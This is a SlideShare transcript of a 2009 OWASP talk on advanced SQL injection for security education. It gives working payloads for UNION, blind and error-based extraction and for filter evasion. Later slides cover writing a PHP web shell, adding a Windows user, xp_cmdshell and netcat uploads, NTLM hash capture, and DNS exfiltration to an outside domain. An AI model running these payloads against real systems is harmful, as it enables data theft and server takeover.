SlideShare una empresa de Scribd logo

Owasp Au Rev4

Descargar como KEY, PDF
S
sumsid1234

Slides from OWASP Au 2009. Recent Advancements in SQL Injection Exploitation techniques

EducaciónTecnología
1 de 34
Recent Advancements In SQL Injection Exploitation Techniques Sumit Siddharth sid@notsosecure.com www.notsosecure.com OWASP Education Project Copyright 2007 © The OWASP Foundation Permission is granted to copy, distribute and/or modify this document under the terms of the OWASP License. The OWASP Foundation http://www.owasp.org Friday, March 13, 2009
About Myself Penetration Tester @Portcullis Computer security LTD (U.K) 4+ Years in Penetration Testing Speaker at a number of conferences Few white papers, advisories, articles and Tools my blog http://www.notsosecure.com I once slept for 20 hours without being under the influence of any OWASP 2 intoxicating substance....:) Friday, March 13, 2009
Agenda SQL Injection Identification  SQL Injections which automated tools will find  SQL Injections which automated tools will not find  Useful Tips Exploitation  Advanced Exploitation Techniques  Real Life Scenarios  Useful Tips Demos/Videos/Screenshots Tool Release(bsqlbf v2.2) OWASP 3 Friday, March 13, 2009
So What is SQL Injection Unsanitized user input used in SQL Calls SQL Calls can be altered to achieve:  Return sensitive information(Confidentiality)‫‏‬  Execution of system code  Data can be altered(Integrity)‫‏‬  Data can be destroyed(Availability)‫‏‬ Example: sql = quot;SELECT password FROM users WHERE username = ‘ quot; + sUser + quot; ‘ quot; sql = quot;SELECT password FROM users WHERE username = ‘A‘ OR 1 =1 -- ‘ OWASP 4 Friday, March 13, 2009
Useful Error Messages Works for MS-SQL and Oracle. Error returns information ‣ e.g. vuln.asp?name= ' and 1=convert(int, @@Version)-- Metadata(MSSQL) Information_schema.columns: table_name, column_name sysobjects, syscolumns Returning more than one row MS-SQL  select convert(int, (SELECT table_name+'::'+column_name+ ', ' + FROM information_schema.columns FOR XML PATH ('') )) Restriction Error messages restricted to 2048 chars [SQL Server 2005] OWASP 5 Friday, March 13, 2009
Error Message In MS-SQL OWASP 6 Friday, March 13, 2009
Oracle Error Messages e.g. vuln.jsp?name= ' and 1=utl_inaddr.get_host_name( (select banner from v$version where rownum=1) )-- Metadata: user_tab_columns: table_name, column_name Returning more then one row: ' and 1=utl_inaddr.get_host_name(select sys.stragg(distinct banner)||' ' from v $version)–[Oracle 11g only] SELECT SUBSTR (SYS_CONNECT_BY_PATH (banner , ','), 2) csv FROM (SELECT banner , ROW_NUMBER () OVER (ORDER BY banner ) rn, COUNT (*) OVER () cnt FROM v$version) WHERE rn = cnt START WITH rn = 1 CONNECT BY rn = PRIOR rn + 1 [All versions] Error message restricted to 512 chars [Oracle] ORA-01489: result of string concatenation is too long OWASP 7 concatenated string value cannot exceed 4000 characters Friday, March 13, 2009
Error Messages In Oracle OWASP 8 Friday, March 13, 2009
Union Queries Must have same number of columns and same data types Identifying number of columns and data types: Order by  Order by clause e.g. select f_name, l_name, email from user where id=4 order by 1  Error ”The ORDER BY position number 4 is out of range of the number of items in the select list”.  Problem: Order by a certain field is not permitted e.g. clob field in oracle Using Nulls  Brute forcing nulls... e.g. vulnerable.asp?id=1 union all select null, null, null--[ use sqlmap]  Problem: A column in a table can be specified not null Using Integers  e.g. select first_name, last_name, email from user where id=4 union all select 1,2,3--  takes less character(if input length restriction is enabled)  accepted as datatypes varchar(), int etc OWASP Hybrid/Combination generally works 9 Friday, March 13, 2009
When Union Won’t work Application selects only one row from SQL Query Injection can’t control the first row returned common bypass examples: –select first_name, last_name, email from user where id= -9999 union select 1,2,3-- –select first_name, last_name, email from user where id= 100 limit 0 union select 1,2,3-- Union after order by, group by not allowed Injection not in SELECT statement OWASP 10 Friday, March 13, 2009
Black Listing/ IPS Bypass SeLEcT PaSSwD FroM usErs(Mixed case, space and Tab separated) SeLeCT/**/pASsWD/**/fROm/**/UsErS space delimiter restriction bypass ASP’s request.querystring strips % if not followed by 2 valid hex chars: DEC%LARE%20@S%20VAR%CHAR(4000)%3BS%ET%20@S%... DECLARE @S VARCHAR(4000);SET @S... ‘; EXEC ('SEL' + 'ECT US' + 'ER')  ‘;exec ('sel'+'ect/**/u'+'ser'); Hex Encoding [e.g. SQL Injection Worm] OWASP 11 Other Encodings Friday, March 13, 2009
MS-SQL 2000 & xp_cmdshell stored procedure in MS SQL allows system code SQL 2000 by default run as system is_srvrolemember(‘sysadmin’)>0 Privilege escalation/brute force via Openrowset Openrowset  ‘;select 1 from openrowset('sqloledb','';'sa';'password','select 1;waitfor delay ''00:00:30'' ');-- uploading netcat  uploading via TFTP  the vulnerable ms-sql should have tftp client  database must have internet connection  database should not have outbound traffic filtering ‣ upload netcat via sql injection ‣ upload nc as hex, convert hex to binary and dump it out as a file; ‣ SQL Ninja does a good job OWASP 12 ‣ Can also use meterpreter Friday, March 13, 2009
Not quite the same in 2005  openrowset generally not available  xp_cmdshell disabled by default  use sp_configure to enable xp_cmdshelll  'network service' not system  Token Kidnapping issue in Windows  “if you can run code as network service you can run code as system”..Ceaser OWASP 13 Friday, March 13, 2009
So, What to do if you are not ‘sa’ if not ‘sa’ then use ‘sp_who’ to enumerate SQL/Windows/Domain users [Mixed mode authentication]. http://127.0.0.1/sqlinjection/?qid=1;BEGIN TRY exec sp_who 'TEST-SYSTEMblah' END TRY BEGIN CATCH return END CATCH waitfor delay '00:00:20'-- Make the SQL server connect to your SMB server(send pre calculated NTLM challenge) and then capture the NTLM response [xp_dirtree] crack the NTLM session hash from the response. Demo OWASP 14 Friday, March 13, 2009
Executing system code with Mysql Load_file and outfile user must have FILE privileges load_file: file must be world readable outfile: create new files in any directory where the MySQL server has write access. under unix mysql generally runs as ‘mysql’ user; under windows as ‘system’ select load_file(‘/etc/passwd’) when gpc_magic_quote is enabled use hex encoding e.g. select load_file( 0x2f6574632f706173737764) read source code select load_file(‘/var/www/index.php’) into outfile ‘var/www/index.txt’ select into outfile create php shell in web root OWASP 15 select ‘<?php passthru($_GET[1]);?>’ into outfile ‘/var/www/owned.php’ Friday, March 13, 2009
Code execution with Mysql...continued windows + php PHP code execution generally restricted under windows Warning: system() [function.system]: Unable to fork insufficient permissions to execute system calls in the web server environment. select ‘net user pwned pwn3d /add’ into outfile ’C:Documents and SettingsAll UsersStart MenuProgramsStartuppwned.bat’ Unix: ssh public/private Keys, .rhosts file weak permissions e.g. apache with mod_userdir OWASP 16 Friday, March 13, 2009
Problems with automated Scanning Injection Fields GET, POST, COOKIES HTTP REFERRER Other Areas What About ACCEPT-LANGUAGE header? Application decoding user’s input(especially in cookies): base64 decode  $admin = base64_decode($admin);  [e.g. php nuke auth.php] url decode  $cookie = explode('; ', urldecode(empty($_POST['cookie']) ;  [e.g. wordpress admin-ajax.php] OWASP Hex decode 17 Friday, March 13, 2009
Examples... Search Functionality(intelligent input to reveal all possible vulnerable areas) OWASP 18 Friday, March 13, 2009
What About DOS!! USING ‘OR’ UPDATE USERS SET PASSWORD=md5($_POST[‘pwd’]) where username= $_POST[‘uname’]; Change Password, Registration functionality etc. Delete query Delete account, Delete Credit Card Information etc. CPU Intensive e.g. benchmark() function OWASP 19 Friday, March 13, 2009
Blind SQL Injection Boolean Logic True And False vulnerable.php?id=100 AND 1=1 vulnerable.php?id=100 AND 1=2 Exploitation: Substring functions e.g. vulnerable.php?id=100 AND ASCII((substring($sql),$position,1))>128 Exploitation is Similar across all databases OWASP 20 Friday, March 13, 2009
Blind SQL Injection...Same response Same response e.g. Injection in INSERT/UPDATE/DELETE statements even if in SELECT statements; in fields other than WHERE clause Exploit Techniques Time Delay functions:  waitfor delay(ms-sql)  benchmark (mysql)  dbms_lock.sleep(Oracle)  pg_sleep(Postgres) Bsql hacker Automated Tools not very efficient in spotting these OWASP 21 Friday, March 13, 2009
True And Error True: SQL syntax is correct Error: SQL syntax is incorrect When possible convert time delay into blind less requests less CPU intensive Automated tools generally fail to flag this Can Use Time delay function, but not very effective OWASP 22 Friday, March 13, 2009
If/Case Statement • mysql> select passwd from user where id=1; +------------+ | passwd | +------------+ | ahsadh@#$% | +------------+ • mysql> select passwd from user where id=(select case when (1=1) then 1 else 1*(s elect table_name from information_schema.tables)end); +------------+ | passwd | +------------+ | ahsadh@#$% | +------------+ 1 row in set (0.00 sec) • mysql> select passwd from user where id=(select case when (1=2) then 1 else 1*(s elect table_name from information_schema.tables)end); ERROR 1242 (21000): Subquery returns more than 1 row Error is now our False response OWASP 23 DEMO Friday, March 13, 2009
Order by, Group by • mysql> select id, passwd from user order by 1; +------+------------+ | id | passwd | +------+------------+ | 1 | ahsadh@#$% | -------------------------- • mysql> select id, passwd from user order by (select case when (1=1) then 1 else 1*(select table_name from information_schema.tables)end) +------+------------+ | id | passwd | +------+------------+ | 1 | ahsadh@#$% | -------------------------- • mysql> select id, passwd from user order by (select case when (1=2) then 1 else 1*(select table_name from information_schema.tables)end) ERROR 1242 (21000): Subquery returns more than 1 row Use True And Error OWASP 24 Friday, March 13, 2009
True And Error Syntax Ms-sql select case when( 1=1) then 1 else 1/0 end Error: Divide by Zero Mysql: select case when (1=1) then 1 else 1*(select table_name from information_schema.tables)end) Error: Sub query returns more than one row Postgres:  SELECT CASE WHEN (1=2) THEN 1 ELSE 1/0 END; Error: Divide by zero Oracle: select case when user='SYS' then 1/0 else (select 1 from dual) end from dual Error: Divide by zero OWASP 25 Friday, March 13, 2009
Injection in Limit and OFFSET $query=quot;select table_name as foo FROM information_schema.tables limit quot;. $gdata; $query=quot;select table_name as foo FROM information_schema.tables limit 1 offset quot;. $gdata; Exploitation: SELECT table_name as foo FROM information_schema.tables limit 0 union all select foo from bar-- SELECT table_name as foo FROM information_schema.tables limit 1 OFFSET 999999 union all select foo from bar-- OWASP 26 Friday, March 13, 2009
Injection In LIMIT & OFFSET LIMIT e.g. select foo from bar limit $_GET[‘id’] Boolean Logic does not work UNION Works Limit the original select to 0 rows to ensure union’s result is displayed OFFSET select foo from bar limit 1 OFFSET $_GET[‘id’] Boolean Logic does not work Union Works Make the offset very large to ensure union’s result is displayed Can also use the CASE within union to convert it into True and Error condition[if blind] e.g. insert into logs values((select data from user_logs limit 1 OFFSET $offset)) OWASP 27 Friday, March 13, 2009
Lets get some numbers then.... Inurl:orderby Inurl:sortby Inurl:groupby, Inurl:start, Inurl:offset, Inurl:limit, etc... OWASP 28 Friday, March 13, 2009
bsqlbf v 2.2 Blind injection True & False (Type: 0) True & Error(Type: 1) Injection in order by(Type: 2) Databases MS-SQL(0) Mysql(1) Postgres(2) Oracle(3) Unless you know what you are doing, it won't do anything.. :( OWASP 29 Friday, March 13, 2009
Out Of Band Channels(OOB) Extracting Data over other channels(e.g. DNS) MS-SQL And Oracle provides OOB functionality which is available to “public” MSSQL[2000&2005] xp_dirtree, xp_fileexists,xp_getfiledetails, sp_add_jobstep e.g. http://victim/exp.asp?name=blah';BEGIN DECLARE @r varchar(8000) SET @r=':' SELECT @r=@r+'.'+name FROM sysobjects WHERE xtype='U' AND name>@r end;DECLARE @x as varchar(8000);SET @x=''+SUBSTRING(@r,1,200)+'.test.notsosecure.comx';EXEC master..xp_DIRTREE @x– Oracle utl_http, utl_tcp, httpuritype e.g. http://victim/vulnerable.php?id=1,200 and(SELECT UTL_INADDR.get_host_address((SELECT user from dual)||'.a.notsosecure.com')+FROM+dual)+is+not+null-- Mysql + windows select load_file(concat('foo6.',(select 'test'),'.notsosecure.com','a.txt')); also perform NTLM attacks however, mysql generally run as system(slide 15) Demo OWASP 30 Friday, March 13, 2009
Fun with Oracle's UTL_HTTP, HTTPURITYPE Not Just resolve names, make TCP connections and use it as a HTTP proxy Hack internal networks Bypass IP restrictions Cross Site Scripting and SQL Injections on internal network with httpuritype and utl_http How about returning a cmd shell from an internal MS-SQL server through Oracle SQL Injection!!!!!!(Demo) OWASP 31 Friday, March 13, 2009
Thanks Questions...? sid@notsosecure.com OWASP 32 Friday, March 13, 2009
References  http://www.owasp.org/images/7/74/Advanced_SQL_Injection.ppt http://blogs.technet.com/neilcar/archive/2008/10/31/sql-injection-hijinks.aspx  http://www.pentestmonkey.net  SQL Ninja(http://sqlninja.sourceforge.net/)  SQL Map(sqlmap.sourceforge.net/)  OOB Defcon Talk: www.inspectit.se/dc15/Defcon_15_Presentation_Web.pdf  Bsql Hacker: (http://labs.portcullis.co.uk/application/bsql-hacker/)  Alexander Kornburst’s blog  SFXSqli paper (http://www.securityfocus.com/archive/1/500764)  ngs’s white papers   http://www.argeniss.com/research/TokenKidnapping.pdf Everything else on the internet related to SQL injection  OWASP 33 Friday, March 13, 2009
Input length restriction(deleted) MS-SQL e.g. vulnerable.asp?id=-1 union all select 1,2,3,4,5,6,long_column_name from long_table_name; – [may be too long] vulnerable.asp?id=1;select * into xx from long_table_name; vulnerable.asp?id=1;exec sp_rename 'xx.long_column_name','xx.tn'; vulnerable.asp?id=-1 union all select 1,2,3,4,5,6,tn from xx– OWASP 34 Friday, March 13, 2009

Recomendados

ORM Injection
ORM InjectionORM Injection
ORM InjectionSimone Onofri
 
Advanced sql injection
Advanced sql injectionAdvanced sql injection
Advanced sql injectionbadhanbd
 
ORM2Pwn: Exploiting injections in Hibernate ORM
ORM2Pwn: Exploiting injections in Hibernate ORMORM2Pwn: Exploiting injections in Hibernate ORM
ORM2Pwn: Exploiting injections in Hibernate ORMMikhail Egorov
 
Advanced sql injection 2
Advanced sql injection 2Advanced sql injection 2
Advanced sql injection 2Karunakar Singh Thakur
 
Capturing, Analyzing, and Optimizing your SQL
Capturing, Analyzing, and Optimizing your SQLCapturing, Analyzing, and Optimizing your SQL
Capturing, Analyzing, and Optimizing your SQLPadraig O'Sullivan
 
JBoss AS Upgrade
JBoss AS UpgradeJBoss AS Upgrade
JBoss AS Upgradesharmami
 
Web Application Security | A developer's perspective - Insecure Direct Object...
Web Application Security | A developer's perspective - Insecure Direct Object...Web Application Security | A developer's perspective - Insecure Direct Object...
Web Application Security | A developer's perspective - Insecure Direct Object...n|u - The Open Security Community
 
Rebooting Software Development - OWASP AppSecUSA
Rebooting Software Development - OWASP AppSecUSA Rebooting Software Development - OWASP AppSecUSA
Rebooting Software Development - OWASP AppSecUSA Nick Galbreath
 

Recomendados

ORM Injection
ORM InjectionORM Injection
ORM InjectionSimone Onofri
 
Advanced sql injection
Advanced sql injectionAdvanced sql injection
Advanced sql injectionbadhanbd
 
ORM2Pwn: Exploiting injections in Hibernate ORM
ORM2Pwn: Exploiting injections in Hibernate ORMORM2Pwn: Exploiting injections in Hibernate ORM
ORM2Pwn: Exploiting injections in Hibernate ORMMikhail Egorov
 
Advanced sql injection 2
Advanced sql injection 2Advanced sql injection 2
Advanced sql injection 2Karunakar Singh Thakur
 
Capturing, Analyzing, and Optimizing your SQL
Capturing, Analyzing, and Optimizing your SQLCapturing, Analyzing, and Optimizing your SQL
Capturing, Analyzing, and Optimizing your SQLPadraig O'Sullivan
 
JBoss AS Upgrade
JBoss AS UpgradeJBoss AS Upgrade
JBoss AS Upgradesharmami
 
Web Application Security | A developer's perspective - Insecure Direct Object...
Web Application Security | A developer's perspective - Insecure Direct Object...Web Application Security | A developer's perspective - Insecure Direct Object...
Web Application Security | A developer's perspective - Insecure Direct Object...n|u - The Open Security Community
 
Rebooting Software Development - OWASP AppSecUSA
Rebooting Software Development - OWASP AppSecUSA Rebooting Software Development - OWASP AppSecUSA
Rebooting Software Development - OWASP AppSecUSA Nick Galbreath
 
Owasp top 10 security threats
Owasp top 10 security threatsOwasp top 10 security threats
Owasp top 10 security threatsVishal Kumar
 
Owasp top-ten-mapping-2015-05-lwc
Owasp top-ten-mapping-2015-05-lwcOwasp top-ten-mapping-2015-05-lwc
Owasp top-ten-mapping-2015-05-lwcKaty Anton
 
OWASP OWTF - Summer Storm - OWASP AppSec EU 2013
OWASP OWTF - Summer Storm - OWASP AppSec EU 2013OWASP OWTF - Summer Storm - OWASP AppSec EU 2013
OWASP OWTF - Summer Storm - OWASP AppSec EU 2013Abraham Aranguren
 
State of OWASP 2015
State of OWASP 2015State of OWASP 2015
State of OWASP 2015tmd800
 
OWASP Free Training - SF2014 - Keary and Manico
OWASP Free Training - SF2014 - Keary and ManicoOWASP Free Training - SF2014 - Keary and Manico
OWASP Free Training - SF2014 - Keary and ManicoEoin Keary
 
RSA Europe 2013 OWASP Training
RSA Europe 2013 OWASP TrainingRSA Europe 2013 OWASP Training
RSA Europe 2013 OWASP TrainingJim Manico
 
OWASP Top Ten in Practice
OWASP Top Ten in PracticeOWASP Top Ten in Practice
OWASP Top Ten in PracticeSecurity Innovation
 
OWASP Open SAMM
OWASP Open SAMMOWASP Open SAMM
OWASP Open SAMMintive
 
2013 OWASP Top 10
2013 OWASP Top 102013 OWASP Top 10
2013 OWASP Top 10bilcorry
 
Basic of SSDLC
Basic of SSDLCBasic of SSDLC
Basic of SSDLCChitpong Wuttanan
 
The OWASP Zed Attack Proxy
The OWASP Zed Attack ProxyThe OWASP Zed Attack Proxy
The OWASP Zed Attack ProxyAditya Gupta
 
[Wroclaw #5] OWASP Projects: beyond Top 10
[Wroclaw #5] OWASP Projects: beyond Top 10[Wroclaw #5] OWASP Projects: beyond Top 10
[Wroclaw #5] OWASP Projects: beyond Top 10OWASP
 
LA part 6
LA part 6LA part 6
LA part 6Cairo university
 
OWASP Top 10 Web Application Vulnerabilities
OWASP Top 10 Web Application VulnerabilitiesOWASP Top 10 Web Application Vulnerabilities
OWASP Top 10 Web Application VulnerabilitiesSoftware Guru
 
OWASP WTE - Now in the Cloud!
OWASP WTE - Now in the Cloud!OWASP WTE - Now in the Cloud!
OWASP WTE - Now in the Cloud!Matt Tesauro
 
ng-owasp: OWASP Top 10 for AngularJS Applications
ng-owasp: OWASP Top 10 for AngularJS Applicationsng-owasp: OWASP Top 10 for AngularJS Applications
ng-owasp: OWASP Top 10 for AngularJS ApplicationsKevin Hakanson
 
Owasp Top 10 And Security Flaw Root Causes
Owasp Top 10 And Security Flaw Root CausesOwasp Top 10 And Security Flaw Root Causes
Owasp Top 10 And Security Flaw Root CausesMarco Morana
 
Web application security: Threats & Countermeasures
Web application security: Threats & CountermeasuresWeb application security: Threats & Countermeasures
Web application security: Threats & CountermeasuresAung Thu Rha Hein
 
Top 10 Web Security Vulnerabilities (OWASP Top 10)
Top 10 Web Security Vulnerabilities (OWASP Top 10)Top 10 Web Security Vulnerabilities (OWASP Top 10)
Top 10 Web Security Vulnerabilities (OWASP Top 10)Brian Huff
 
XML Attack Surface - Pierre Ernst (OWASP Ottawa)
XML Attack Surface - Pierre Ernst (OWASP Ottawa)XML Attack Surface - Pierre Ernst (OWASP Ottawa)
XML Attack Surface - Pierre Ernst (OWASP Ottawa)OWASP Ottawa
 
SQL Injection: complete walkthrough (not only) for PHP developers
SQL Injection: complete walkthrough (not only) for PHP developersSQL Injection: complete walkthrough (not only) for PHP developers
SQL Injection: complete walkthrough (not only) for PHP developersKrzysztof Kotowicz
 
Database design i_-_1_dl300
Database design i_-_1_dl300Database design i_-_1_dl300
Database design i_-_1_dl300KOI Lastone
 

Más contenido relacionado

Destacado

Owasp top 10 security threats
Owasp top 10 security threatsOwasp top 10 security threats
Owasp top 10 security threatsVishal Kumar
 
Owasp top-ten-mapping-2015-05-lwc
Owasp top-ten-mapping-2015-05-lwcOwasp top-ten-mapping-2015-05-lwc
Owasp top-ten-mapping-2015-05-lwcKaty Anton
 
OWASP OWTF - Summer Storm - OWASP AppSec EU 2013
OWASP OWTF - Summer Storm - OWASP AppSec EU 2013OWASP OWTF - Summer Storm - OWASP AppSec EU 2013
OWASP OWTF - Summer Storm - OWASP AppSec EU 2013Abraham Aranguren
 
State of OWASP 2015
State of OWASP 2015State of OWASP 2015
State of OWASP 2015tmd800
 
OWASP Free Training - SF2014 - Keary and Manico
OWASP Free Training - SF2014 - Keary and ManicoOWASP Free Training - SF2014 - Keary and Manico
OWASP Free Training - SF2014 - Keary and ManicoEoin Keary
 
RSA Europe 2013 OWASP Training
RSA Europe 2013 OWASP TrainingRSA Europe 2013 OWASP Training
RSA Europe 2013 OWASP TrainingJim Manico
 
OWASP Open SAMM
OWASP Open SAMMOWASP Open SAMM
OWASP Open SAMMintive
 
2013 OWASP Top 10
2013 OWASP Top 102013 OWASP Top 10
2013 OWASP Top 10bilcorry
 
The OWASP Zed Attack Proxy
The OWASP Zed Attack ProxyThe OWASP Zed Attack Proxy
The OWASP Zed Attack ProxyAditya Gupta
 
[Wroclaw #5] OWASP Projects: beyond Top 10
[Wroclaw #5] OWASP Projects: beyond Top 10[Wroclaw #5] OWASP Projects: beyond Top 10
[Wroclaw #5] OWASP Projects: beyond Top 10OWASP
 
OWASP Top 10 Web Application Vulnerabilities
OWASP Top 10 Web Application VulnerabilitiesOWASP Top 10 Web Application Vulnerabilities
OWASP Top 10 Web Application VulnerabilitiesSoftware Guru
 
OWASP WTE - Now in the Cloud!
OWASP WTE - Now in the Cloud!OWASP WTE - Now in the Cloud!
OWASP WTE - Now in the Cloud!Matt Tesauro
 
ng-owasp: OWASP Top 10 for AngularJS Applications
ng-owasp: OWASP Top 10 for AngularJS Applicationsng-owasp: OWASP Top 10 for AngularJS Applications
ng-owasp: OWASP Top 10 for AngularJS ApplicationsKevin Hakanson
 
Owasp Top 10 And Security Flaw Root Causes
Owasp Top 10 And Security Flaw Root CausesOwasp Top 10 And Security Flaw Root Causes
Owasp Top 10 And Security Flaw Root CausesMarco Morana
 
Web application security: Threats & Countermeasures
Web application security: Threats & CountermeasuresWeb application security: Threats & Countermeasures
Web application security: Threats & CountermeasuresAung Thu Rha Hein
 
Top 10 Web Security Vulnerabilities (OWASP Top 10)
Top 10 Web Security Vulnerabilities (OWASP Top 10)Top 10 Web Security Vulnerabilities (OWASP Top 10)
Top 10 Web Security Vulnerabilities (OWASP Top 10)Brian Huff
 

Destacado (19)

Owasp top 10 security threats
Owasp top 10 security threatsOwasp top 10 security threats
Owasp top 10 security threats
 
Owasp top-ten-mapping-2015-05-lwc
Owasp top-ten-mapping-2015-05-lwcOwasp top-ten-mapping-2015-05-lwc
Owasp top-ten-mapping-2015-05-lwc
 
OWASP OWTF - Summer Storm - OWASP AppSec EU 2013
OWASP OWTF - Summer Storm - OWASP AppSec EU 2013OWASP OWTF - Summer Storm - OWASP AppSec EU 2013
OWASP OWTF - Summer Storm - OWASP AppSec EU 2013
 
State of OWASP 2015
State of OWASP 2015State of OWASP 2015
State of OWASP 2015
 
OWASP Free Training - SF2014 - Keary and Manico
OWASP Free Training - SF2014 - Keary and ManicoOWASP Free Training - SF2014 - Keary and Manico
OWASP Free Training - SF2014 - Keary and Manico
 
RSA Europe 2013 OWASP Training
RSA Europe 2013 OWASP TrainingRSA Europe 2013 OWASP Training
RSA Europe 2013 OWASP Training
 
OWASP Top Ten in Practice
OWASP Top Ten in PracticeOWASP Top Ten in Practice
OWASP Top Ten in Practice
 
OWASP Open SAMM
OWASP Open SAMMOWASP Open SAMM
OWASP Open SAMM
 
2013 OWASP Top 10
2013 OWASP Top 102013 OWASP Top 10
2013 OWASP Top 10
 
Basic of SSDLC
Basic of SSDLCBasic of SSDLC
Basic of SSDLC
 
The OWASP Zed Attack Proxy
The OWASP Zed Attack ProxyThe OWASP Zed Attack Proxy
The OWASP Zed Attack Proxy
 
[Wroclaw #5] OWASP Projects: beyond Top 10
[Wroclaw #5] OWASP Projects: beyond Top 10[Wroclaw #5] OWASP Projects: beyond Top 10
[Wroclaw #5] OWASP Projects: beyond Top 10
 
LA part 6
LA part 6LA part 6
LA part 6
 
OWASP Top 10 Web Application Vulnerabilities
OWASP Top 10 Web Application VulnerabilitiesOWASP Top 10 Web Application Vulnerabilities
OWASP Top 10 Web Application Vulnerabilities
 
OWASP WTE - Now in the Cloud!
OWASP WTE - Now in the Cloud!OWASP WTE - Now in the Cloud!
OWASP WTE - Now in the Cloud!
 
ng-owasp: OWASP Top 10 for AngularJS Applications
ng-owasp: OWASP Top 10 for AngularJS Applicationsng-owasp: OWASP Top 10 for AngularJS Applications
ng-owasp: OWASP Top 10 for AngularJS Applications
 
Owasp Top 10 And Security Flaw Root Causes
Owasp Top 10 And Security Flaw Root CausesOwasp Top 10 And Security Flaw Root Causes
Owasp Top 10 And Security Flaw Root Causes
 
Web application security: Threats & Countermeasures
Web application security: Threats & CountermeasuresWeb application security: Threats & Countermeasures
Web application security: Threats & Countermeasures
 
Top 10 Web Security Vulnerabilities (OWASP Top 10)
Top 10 Web Security Vulnerabilities (OWASP Top 10)Top 10 Web Security Vulnerabilities (OWASP Top 10)
Top 10 Web Security Vulnerabilities (OWASP Top 10)
 

Similar a Owasp Au Rev4

XML Attack Surface - Pierre Ernst (OWASP Ottawa)
XML Attack Surface - Pierre Ernst (OWASP Ottawa)XML Attack Surface - Pierre Ernst (OWASP Ottawa)
XML Attack Surface - Pierre Ernst (OWASP Ottawa)OWASP Ottawa
 
SQL Injection: complete walkthrough (not only) for PHP developers
SQL Injection: complete walkthrough (not only) for PHP developersSQL Injection: complete walkthrough (not only) for PHP developers
SQL Injection: complete walkthrough (not only) for PHP developersKrzysztof Kotowicz
 
Database design i_-_1_dl300
Database design i_-_1_dl300Database design i_-_1_dl300
Database design i_-_1_dl300KOI Lastone
 
SQL Injection: Amplifying Data Leakeage
SQL Injection: Amplifying Data LeakeageSQL Injection: Amplifying Data Leakeage
SQL Injection: Amplifying Data LeakeageUlisses Castro
 
Advanced_SQL_ISASasASasaASnjection (1).ppt
Advanced_SQL_ISASasASasaASnjection (1).pptAdvanced_SQL_ISASasASasaASnjection (1).ppt
Advanced_SQL_ISASasASasaASnjection (1).pptssuserde23af
 
One Click Ownage Ferruh Mavituna (3)
One Click Ownage Ferruh Mavituna (3)One Click Ownage Ferruh Mavituna (3)
One Click Ownage Ferruh Mavituna (3)Ferruh Mavituna
 
XML Schema Patterns for Databinding
XML Schema Patterns for DatabindingXML Schema Patterns for Databinding
XML Schema Patterns for DatabindingPaul Downey
 
Create custom looping procedures in sql server 2005 tech republic
Create custom looping procedures in sql server 2005 tech republicCreate custom looping procedures in sql server 2005 tech republic
Create custom looping procedures in sql server 2005 tech republicKaing Menglieng
 
Perf Tuning Best Practices
Perf Tuning Best PracticesPerf Tuning Best Practices
Perf Tuning Best Practicesguest01bbdd
 
LogLogic SQL Server Hacking DBs April09
LogLogic SQL Server Hacking DBs April09LogLogic SQL Server Hacking DBs April09
LogLogic SQL Server Hacking DBs April09Mark Ginnebaugh
 
Solving Performance Problems Using MySQL Enterprise Monitor
Solving Performance Problems Using MySQL Enterprise MonitorSolving Performance Problems Using MySQL Enterprise Monitor
Solving Performance Problems Using MySQL Enterprise MonitorOracleMySQL
 
Industrial Strength Groovy - Tools for the Professional Groovy Developer: Pau...
Industrial Strength Groovy - Tools for the Professional Groovy Developer: Pau...Industrial Strength Groovy - Tools for the Professional Groovy Developer: Pau...
Industrial Strength Groovy - Tools for the Professional Groovy Developer: Pau...Paul King
 
[Strukelj] Why will Java 7.0 be so cool
[Strukelj] Why will Java 7.0 be so cool[Strukelj] Why will Java 7.0 be so cool
[Strukelj] Why will Java 7.0 be so cooljavablend
 
D Trace Support In My Sql Guide To Solving Reallife Performance Problems
D Trace Support In My Sql Guide To Solving Reallife Performance ProblemsD Trace Support In My Sql Guide To Solving Reallife Performance Problems
D Trace Support In My Sql Guide To Solving Reallife Performance ProblemsMySQLConference
 
Whatever it takes - Fixing SQLIA and XSS in the process
Whatever it takes - Fixing SQLIA and XSS in the processWhatever it takes - Fixing SQLIA and XSS in the process
Whatever it takes - Fixing SQLIA and XSS in the processguest3379bd
 
Terracotta Java Scalability - Stateless Versus Stateful Apps
Terracotta Java Scalability - Stateless Versus Stateful AppsTerracotta Java Scalability - Stateless Versus Stateful Apps
Terracotta Java Scalability - Stateless Versus Stateful AppsMatthew McCullough
 

Similar a Owasp Au Rev4 (20)

XML Attack Surface - Pierre Ernst (OWASP Ottawa)
XML Attack Surface - Pierre Ernst (OWASP Ottawa)XML Attack Surface - Pierre Ernst (OWASP Ottawa)
XML Attack Surface - Pierre Ernst (OWASP Ottawa)
 
SQL Injection: complete walkthrough (not only) for PHP developers
SQL Injection: complete walkthrough (not only) for PHP developersSQL Injection: complete walkthrough (not only) for PHP developers
SQL Injection: complete walkthrough (not only) for PHP developers
 
Database design i_-_1_dl300
Database design i_-_1_dl300Database design i_-_1_dl300
Database design i_-_1_dl300
 
SQL Injection: Amplifying Data Leakeage
SQL Injection: Amplifying Data LeakeageSQL Injection: Amplifying Data Leakeage
SQL Injection: Amplifying Data Leakeage
 
Advanced_SQL_ISASasASasaASnjection (1).ppt
Advanced_SQL_ISASasASasaASnjection (1).pptAdvanced_SQL_ISASasASasaASnjection (1).ppt
Advanced_SQL_ISASasASasaASnjection (1).ppt
 
One Click Ownage Ferruh Mavituna (3)
One Click Ownage Ferruh Mavituna (3)One Click Ownage Ferruh Mavituna (3)
One Click Ownage Ferruh Mavituna (3)
 
XML Schema Patterns for Databinding
XML Schema Patterns for DatabindingXML Schema Patterns for Databinding
XML Schema Patterns for Databinding
 
SQL injection: Not only AND 1=1
SQL injection: Not only AND 1=1SQL injection: Not only AND 1=1
SQL injection: Not only AND 1=1
 
55j7
55j755j7
55j7
 
Create custom looping procedures in sql server 2005 tech republic
Create custom looping procedures in sql server 2005 tech republicCreate custom looping procedures in sql server 2005 tech republic
Create custom looping procedures in sql server 2005 tech republic
 
Perf Tuning Best Practices
Perf Tuning Best PracticesPerf Tuning Best Practices
Perf Tuning Best Practices
 
Asp
AspAsp
Asp
 
Memory Deduction Games
Memory Deduction GamesMemory Deduction Games
Memory Deduction Games
 
LogLogic SQL Server Hacking DBs April09
LogLogic SQL Server Hacking DBs April09LogLogic SQL Server Hacking DBs April09
LogLogic SQL Server Hacking DBs April09
 
Solving Performance Problems Using MySQL Enterprise Monitor
Solving Performance Problems Using MySQL Enterprise MonitorSolving Performance Problems Using MySQL Enterprise Monitor
